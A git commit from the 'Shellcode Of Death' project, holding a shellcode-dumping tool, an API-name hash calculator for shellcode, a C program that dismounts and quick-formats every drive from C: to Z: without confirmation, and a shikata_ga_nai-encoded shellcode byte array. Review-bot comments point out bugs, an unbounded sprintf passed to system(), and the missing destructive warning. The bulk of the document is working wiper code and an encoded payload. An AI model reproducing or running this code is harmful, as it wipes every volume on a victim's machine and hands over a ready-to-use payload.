
Commit 2c226ac

committed
Shellcode Of Death files.
1 parent 390105b commit 2c226ac

22 files changed

Lines changed: 1128 additions & 0 deletions

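--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1 @@
+/.project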

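--- a/DumpShellcode.c
+++ b/DumpShellcode.c
@@ -0,0 +1,132 @@
+/*
+_ __ _____
+/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
+/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
+/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
+\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
+|___/
+
+http://hacksys.vfreaks.com/
+hacksysteam@hotmail.com
+
+Module Name:
+
+Dump Shellcode In C Style
+
+Abstract:
+
+A simple program that will generate shellcode from source file.
+Using pure assembly is prefered.
+the binary path of gcc and objcopy must add to the windows environment.
+This code is only work for windows platform not linux. ;)
+by MicroMike
+
+Fixed by Ashfaq Ansari
+
+IDE:
+
+Dev-C++ 4.9.9.2 (Windows XP SP3)
+
+Compiler:
+
+gcc 3.4.2
+
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+
+void create_obj_file(const char *filename){
+char command[100];
+sprintf(command, "gcc -c -o temp.o %s", filename);
+system(command);
+/* strip the trash section such as debug */
+//system("objcopy --strip-debug --strip-unneeded temp.o");
+system("objcopy --strip-all temp.o");
+}
+
+void dump_shellcode(FILE *optr){
+unsigned int loop, counter=1, ch=1, nop_counter=0, null_counter=0;
+unsigned char header[20];
+unsigned short *SectionNum;
+int buffer;
+unsigned char str_to_write[50];
+FILE *iptr;
+iptr = fopen("temp.o", "rb");
+if(iptr == NULL){
+printf("Can not open file, is the file name correct??\n");
+exit(1);
+}
+/* reading header */
+for(loop=0; loop<20; loop++){
+header[loop] = fgetc(iptr);
+}
+/* This is the field I care for ~~ */
+/* this value should only be one, only has .text section */
+SectionNum = (unsigned short*)&(header[2]);
+
+/* each section header has 40 bytes*/
+fseek(iptr, 40*(*SectionNum), SEEK_CUR);
+
+/* the following is just some file operations */
+fputs("unsigned char *shellcode=\n\"", optr);
+
+printf("\nExtracting the shellcode:\n\n");
+
+printf("unsigned char *shellcode=\n\"");
+
+while(ch != feof(iptr)){
+
+memset(str_to_write, 0, 50);
+buffer = fgetc(iptr);
+
+/* GCC issue on Windows:
+Why does GCC pad functions with NOPs?
+http://stackoverflow.com/questions/7912464/why-does-gcc-pad-functions-with-nops
+*/
+if(buffer == 0x90){
+nop_counter++;
+}
+if(nop_counter > 1){
+break;
+}
+/* Null byte counter */
+if(buffer == 0x00){
+null_counter++;
+}
+sprintf(str_to_write, "\\x%02x", buffer);
+printf("%s", str_to_write);
+fputs(str_to_write, optr);
+if(counter++ > 10){
+printf("\"\n\"");
+fputs("\"\n\"",optr);
+counter = 1;
+}
+ch++;
+}
+
+printf("\"\n");
+fputs("\"\n", optr);
+printf("\nLength of Shellcode: %d", ch-1);
+printf("\nNumber of NULL's: %d\n", null_counter);
+fclose(iptr);
+}
+
+int main(int argc, char **argv){
+FILE *optr;
+if(argc < 2){
+printf("\nUsage: DumpShellcode.exe <Source assembly file> <Output dump file>\n");
+exit(1);
+}
+create_obj_file(argv[1]);
+
+optr = fopen(argv[2], "w");
+if(optr == NULL){
+printf("Can not create new file: %s", argv[2]);
+exit(1);
+}
+dump_shellcode(optr);
+fclose(optr);
+system("del temp.o");
+
+}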
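Review bot: `create_obj_file` formats `argv[1]` into the 100-byte `command` with an unbounded `sprintf` and then hands the result to `system()`, so a long path overruns the stack buffer and a path containing shell metacharacters runs whatever follows them; bound it with `if (snprintf(command, sizeof command, "gcc -c -o temp.o %s", filename) >= (int)sizeof command) { fputs("filename too long\n", stderr); exit(1); }` and reject names containing `& | ; < >` before calling `system`. `main` tests `argc < 2` but dereferences `argv[2]`, so a single argument reaches `fopen(NULL, "w")`; the check should be `argc < 3`. The loop condition `while(ch != feof(iptr))` compares a byte counter with the value of `feof`'s flag, so the loop only ends through the NOP-counter break or when the counter happens to equal that flag, and the first `EOF` (-1) from `fgetc` is dumped as `\xffffffff`; the intended form is `while ((buffer = fgetc(iptr)) != EOF)`. Separately, `nop_counter > 1` stops the dump at the second 0x90 byte anywhere in the section, which silently truncates shellcode that legitimately contains two NOPs, and `memset` is used without `#include <string.h>`.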

DumpShellcode.exe

18.4 KB
Binary file not shown.

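--- a/HashCalculator.cpp
+++ b/HashCalculator.cpp
@@ -0,0 +1,67 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+/*
+_ __ _____
+/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
+/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
+/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
+\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
+|___/
+
+http://hacksys.vfreaks.com/
+hacksysteam@hotmail.com
+
+Thanks to:
+
+Ruei-Min Jiang (@mike820324) a.k.a MicroMike
+respect to you bro.
+
+Module Name:
+
+Hash Calculator
+
+Abstract:
+
+This function calculates the Function hash according
+to its name.
+
+IDE:
+
+Dev-C++ 4.9.9.2 (Windows XP SP3)
+
+Compiler:
+
+gcc 3.4.2
+
+*/
+
+unsigned int hash_function(const char* string){
+unsigned int value = 0;
+__asm__("xor %%ebx, %%ebx;\n\t\
+loop:\n\t\
+xor %%eax, %%eax;\n\t\
+lodsb;\n\t\
+rol $5, %%ebx;\n\t\
+addl %%eax, %%ebx;\n\t\
+cmp $0, %%eax;\n\t\
+jnz loop;\n\t\
+ror $5, %%ebx;\n\t\
+movl %%ebx, %0;\n\t"
+:"=m" (value)
+:"S" (string)
+:
+);
+printf("%s: 0x%x\n",string,value);
+}
+
+int main(){
+hash_function("LoadLibraryA");
+hash_function("CloseHandle");
+hash_function("CreateFileA");
+hash_function("ExitProcess");
+hash_function("FormatEx");
+hash_function("DeviceIoControl");
+hash_function("Sleep");
+system("pause");
+}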
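Review bot: The inline asm in `hash_function` overwrites `eax` and `ebx`, sets the flags and advances `esi` through `lodsb`, but its clobber list is empty and `string` is declared input-only, so the compiler is free to keep live values in those registers across the statement and the hash may come out wrong or corrupt the caller once optimisation or inlining kicks in. The operand section should read `: "=m" (value), "+S" (string) : : "eax", "ebx", "cc"`, and the global label `loop:` / `jnz loop` should become the local form `1:` / `jnz 1b` so two inlined copies do not produce a duplicate symbol. `hash_function` is also declared `unsigned int` but never returns anything; add `return value;` after the `printf` so callers can use the hash instead of reading it off the console. The function depends on 32-bit register usage (`ebx`, `lodsb` with `%esi`), which is worth stating in the header comment since the file is otherwise plain C compiled as `.cpp`.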

HashCalculator.exe

15.5 KB
Binary file not shown.

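--- a/ShellcodeOfDeath.c
+++ b/ShellcodeOfDeath.c
@@ -0,0 +1,145 @@
+#include <windows.h>
+#include <WinIoCtl.h>
+#define _UNICODE 1
+
+/*
+_ __ _____
+/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
+/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
+/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
+\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
+|___/
+
+http://hacksys.vfreaks.com/
+hacksysteam@hotmail.com
+
+Author:
+
+Ashfaq Ansari
+hacksysteam@hotmail.com
+
+Thanks:
+
+Mark Russinovich (Systems Internals - http://www.sysinternals.com)
+
+Module Name:
+
+Shellcode Of Death
+
+Abstract:
+
+This is a proof of concept shellcode in C format.
+
+IDE:
+
+Dev-C++ 4.9.9.2 (Windows XP SP3)
+
+Compiler:
+
+gcc 3.4.2
+
+*/
+
+typedef enum {
+PROGRESS,
+DONEWITHSTRUCTURE,
+UNKNOWN2,
+UNKNOWN3,
+UNKNOWN4,
+UNKNOWN5,
+INSUFFICIENTRIGHTS,
+UNKNOWN7,
+VOLUME_IN_USE,
+CANT_QUICK_FORMAT,
+UNKNOWNA,
+DONE,
+UNKNOWNC,
+UNKNOWND,
+OUTPUT,
+STRUCTUREPROGRESS
+} CALLBACKCOMMAND;
+
+typedef BOOLEAN (__stdcall *PFMIFSCALLBACK)( CALLBACKCOMMAND Command,
+DWORD SubAction,
+PVOID ActionInfo );
+
+typedef VOID (__stdcall *PFORMATEX)( PWCHAR DriveRoot,
+DWORD MediaFlag,
+PWCHAR Format,
+PWCHAR Label,
+BOOL QuickFormat,
+DWORD ClusterSize,
+PFMIFSCALLBACK Callback );
+
+PFORMATEX FormatEx;
+
+BOOLEAN __stdcall FormatExCallback( CALLBACKCOMMAND Command,
+DWORD Modifier,
+PVOID Argument )
+{
+return TRUE;
+}
+
+
+int main( )
+{
+int i;
+int res;
+char szVolumeAccessPath[] = "\\\\.\\X:";
+DWORD dwRet;
+HANDLE hVolRead;
+PWCHAR DriveList[] = {L"C:", L"D:", L"E:", L"F:", L"G:", L"H:", L"I:",
+L"J:", L"K:", L"L:", L"M:", L"N:", L"O:", L"P:",
+L"Q:", L"R:", L"S:", L"T:", L"U:", L"V:", L"W:",
+L"X:", L"Y:", L"Z:"};
+WCHAR RootDirectory[MAX_PATH];
+
+LoadLibrary( "fmifs.dll" );
+FormatEx = (void *) GetProcAddress(GetModuleHandle("fmifs.dll"),
+"FormatEx");
+
+for ( i = 0; i <= 23; i++){
+
+wcscpy( RootDirectory,DriveList[i] );
+RootDirectory[2] = L'\\';
+RootDirectory[3] = (WCHAR) 0;
+szVolumeAccessPath[4] = RootDirectory[0];
+
+//Get the handle to the drive
+hVolRead = CreateFile(szVolumeAccessPath,
+GENERIC_READ | GENERIC_WRITE,
+FILE_SHARE_READ | FILE_SHARE_WRITE,
+NULL,
+OPEN_EXISTING,
+0,
+NULL);
+
+// dismount the file system
+// no need to lock the volume
+// once dismounted all the handles will be invalid
+res = DeviceIoControl(hVolRead,
+FSCTL_DISMOUNT_VOLUME,
+NULL,
+0,
+NULL,
+0,
+&dwRet,
+NULL);
+
+// Close the handle
+CloseHandle(hVolRead);
+
+//Format the drive
+//Proceed to next drive if error occurs
+FormatEx(RootDirectory,
+0xC,
+L"NTFS",
+L"PwNeD - HackSys Team",
+TRUE,
+4096,
+FormatExCallback );
+
+Sleep(200);
+}
+return 0;
+}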
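Review bot: Nothing in this file states what it does to the machine it runs on: `main` walks `C:` through `Z:`, dismounts each volume and calls `FormatEx` with a quick NTFS format and no confirmation, so the header comment should carry a warning such as `/* DESTRUCTIVE: formats every volume C:..Z: without prompting — run only inside a disposable VM */`. The `CreateFile` result is never compared against `INVALID_HANDLE_VALUE`, and `GetProcAddress` is never checked for `NULL`, so a missing drive letter feeds an invalid handle to `DeviceIoControl` and `CloseHandle`, and a host without `fmifs.dll` crashes on the first indirect call. The comment `//Proceed to next drive if error occurs` is misleading because `PFORMATEX` is declared `VOID` and `FormatExCallback` returns `TRUE` for every `CALLBACKCOMMAND` (including `INSUFFICIENTRIGHTS` and `VOLUME_IN_USE`), so no error is ever observed; `res` is assigned and never read. `#define _UNICODE 1` appears after the Windows headers are already included and has no effect on them.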

ShellcodeOfDeath.exe

17.4 KB
Binary file not shown.
Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=1)
2+
3+
unsigned char buf[] =
4+
"\xdd\xc2\xbd\x7d\x18\xca\x70\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
5+
"\x6b\x83\xe8\xfc\x31\x68\x14\x03\x68\x69\xfa\x3f\x9b\xcb\xcb"
6+
"\x7f\xd7\xdf\xa8\x81\x3e\x4c\xff\xb0\x65\x43\x3f\x1e\x58\x60"
7+
"\xba\x5e\x98\xe5\x3d\x60\x6b\x1a\x7c\xaa\x96\xe5\xb4\x75\xc2"
8+
"\x61\x48\xc6\x1f\x57\x8d\x4f\x0f\xec\x52\x6c\x3b\xb6\x50\xf4"
9+
"\xb6\x32\x57\x54\x42\x7a\x77\xd9\x48\x78\x9f\x22\x8f\x83\xa0"
10+
"\xfe\xfb\x30\x7b\x8c\xf0\xcc\xe5\x05\x0c\x91\xcc\xe6\xf2\x11"
11+
"\x0f\x92\x56\x0d\x82\xb8\x72\xa6\x98\x43\x0f\xbc\xa2\x80\x21"
12+
"\x75\xc6\xa7\x72\x85\x07\xa8\xf9\xc5\x0b\x23\xbd\xd9\x98\x63"
13+
"\x36\x6a\xe6\xa3\xcd\x6c\x2d\xeb\xc9\x19\xa2\x9b\x8d\xba\x46"
14+
"\xf7\x26\x2c\xe6\x60\xb2\x24\x4f\xba\x88\x8f\xe7\xd5\x61\x8d"
15+
"\x20\xb1\x06\xde\x89\xae\x61\xe6\xf0\x9f\xbd\x8e\x26\x02\x5b"
16+
"\x7d\x5e\x58\x36\x86\x39\x92\x38\x0b\x40\xd5\xb3\x07\xe2\x3d"
17+
"\x27\x9c\x40\xe6\x44\x5d\x98\x6f\xb6\xf8\x48\xfb\x7b\x47\x6a"
18+
"\x13\xe8\x48\x94\x1c\xb6\xe6\x2c\x01\xa9\x8f\x56\x2e\x25\x67"
19+
"\x47\x4e\xc5\x88\x1e\xdc\x53\x10\xac\x30\xc0\xb0\x3e\x4d\xe3"
20+
"\x36\xe1\x27\xe4\x9f\x94\x77\x3b\xcd\xf5\xd5\x56\xf2\xab\xb3"
21+
"\xa5\x9c\x4b\x44\xaa\x9c\x1a\xcf\xf7\x08\x5c\x1c\x57\xb3\x4e"
22+
"\xa7\x69\x61\xdc\x25\xd5\xa1\xe5\x66\xb4\xfb\xb7\xda\x50\xdb"
23+
"\x37\xd2\xa0\x4b\xb3\xb9\xa8\x94\x10\xbe\xdd\x4e\x93\xca\x43"
24+
"\x82\x64\x1f\xf6\x1c\xdc\xa0\x09\x20\xb1\xc8\x09\x30\x31\x09"
25+
"\x60\x31\xbc\x8f\x6e\x31\xbe\x8f\xde\xbc\x38\x9f\xde\xbe\x44"
26+
"\xf0\xb4\xb2\xc9\xb6\x40\x9a\x5a\x6b\x51\xe5\x8e\xfc\x99\x19"
27+
"\x31\xfd\x92\x44\x35\x02\x77\xff\xcc\x7f\x3e\xf7\x2f\x62\x32"
28+
"\x6d\x30\xe9\x10\x61\xcf\x3e\x42\xfc\xd0\x3e\x6c\xa2\x2e\x9d"
29+
"\x93\x74\x2f\x41\x94\xcb\x2f\x43\x94\x97\x2f\xb3\x94\x69\x30"
30+
"\xe7\x94\x33\x30\x54\x95\xbb\x30\x0a\x95\xcc\x30\xe4\x95\x57"
31+
"\x31\x9c\x95\xb7\x31\x3e\x96\xce\x31\x9e\x96\x78\x32\xbf\x96"
32+
"\x1b\x32\x54\x97\x88\x32\xd3\x97\x5d\x33\x03\x98\xf5\x33\x26"
33+
"\x98\x94\x33\xc5\x98\x56\x34\x40\x10\xb3\x05\xaa\x62\x66\xa4"
34+
"\x26\x63";
